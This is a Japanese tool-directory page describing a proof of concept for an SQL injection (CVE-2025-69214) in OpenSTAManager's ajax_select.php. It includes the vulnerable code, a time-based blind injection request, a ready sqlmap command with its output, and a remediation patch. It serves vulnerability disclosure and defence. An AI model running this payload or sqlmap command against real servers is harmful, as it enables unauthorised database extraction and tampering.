Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-69214 — CVE-2025-69214 の概念実証。OpenSTAManager の ajax_select.php componenti エンドポイントにおける SQL インジェクションです。脆弱なコード分析、SQLMap を使用した時間ベースのブラインド悪用、是正ガイダンスを含みます。 | Kitploit
ツール/GitHubGitHub/lukasz-rybak/cve-2025-69214
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育データベースセキュリティ
GitHublukasz-rybak/cve-2025-69214

CVE-2025-69214

CVE-2025-69214 の概念実証。OpenSTAManager の ajax_select.php componenti エンドポイントにおける SQL インジェクションです。脆弱なコード分析、SQLMap を使用した時間ベースのブラインド悪用、是正ガイダンスを含みます。

リポジトリを見る
35ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-69214: OpenSTAManager の ajax_select.php (componenti エンドポイント) における SQLインジェクション

概要

項目詳細
CVE IDCVE-2025-69214
重要度HIGH
アドバイザリアドバイザリを表示
発見者Lukasz Rybak

影響を受ける製品

  • devcode-it/openstamanager (バージョン: <= 2.9.8)

CWE 分類

  • CWE-89: SQL コマンドで使用される特殊要素の不適切な無効化 (「SQLインジェクション」)

詳細

要約

ajax_select.php エンドポイントが componenti 操作を処理する際に、SQLインジェクションの脆弱性が存在します。認証済みの攻撃者は、options[matricola] パラメータを介して悪意のある SQL コードを注入できます。

概念実証 (PoC)

脆弱なコード

ファイル: modules/impianti/ajax/select.php:122-124

root@kitploit:~
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

データフロー

  1. ソース: $_GET['options']['matricola'] → $superselect['matricola']
  2. 脆弱性: ユーザー入力がサニタイズなしで IN() 句に直接連結される
  3. シンク: AJAX フレームワークを介して実行されるクエリ

エクスプロイト

手動PoC (時間ベースのブラインドSQLi):

root@kitploit:~
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
画像

SQLMap による悪用:

root@kitploit:~
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

SQLMap の出力:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
画像

影響

  • データ流出: 時間ベースのブラインドSQLインジェクションにより、データベース全体の抽出が可能
  • 認証バイパス: 機密性の高いコンポーネントおよび機器データへのアクセス
  • データ改ざん: レコードが不正に変更される可能性

修正方法

SQL で使用する前に値を整数にキャストしてください:

修正前:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

修正後:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

クレジット

発見者: Łukasz Rybak

参照

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69214
  • https://github.com/advisories/GHSA-qjv8-63xq-gq8m

免責事項

この CVE は、協調的な脆弱性開示の慣行に従って責任を持って開示されました。ここに記載されている情報は、教育および防御目的のみを目的としています。

ツールをダウンロード